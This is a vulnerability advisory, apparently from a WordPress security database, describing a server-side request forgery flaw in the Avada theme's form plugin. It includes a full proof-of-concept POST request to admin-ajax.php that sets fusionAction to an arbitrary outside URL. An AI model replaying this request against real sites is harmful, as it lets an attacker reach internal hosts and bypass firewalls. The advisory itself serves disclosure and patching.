The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.
Attacker can control the URL (fusionAction parameter) and method (fusionActionMethod parameter) of the HTTP request. POST /wp-admin/admin-ajax.php HTTP/1.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268 Content-Length: 1457 Connection: close -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="formData" [email protected]&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval= 48&privacy_expiration_action=ignore&fusion-form-nonce-10361=e222df00dd&fusion-fields-hold-private-data= -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="action" fusion_form_submit_form_to_url -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="fusion_form_nonce" e222df00dd -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="form_id" 10361 -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="post_id" 8988 -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="field_labels" {"email":"Email address"} -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="hidden_field_names" [] -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="fusionAction" https://arbitrary.com/ -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="fusionActionMethod" post -----------------------------30259827232283860776499538268—
Calum Elrick
Yes
2022-04-19 (about 1 years ago)
2022-04-19 (about 1 years ago)
2022-04-20 (about 1 years ago)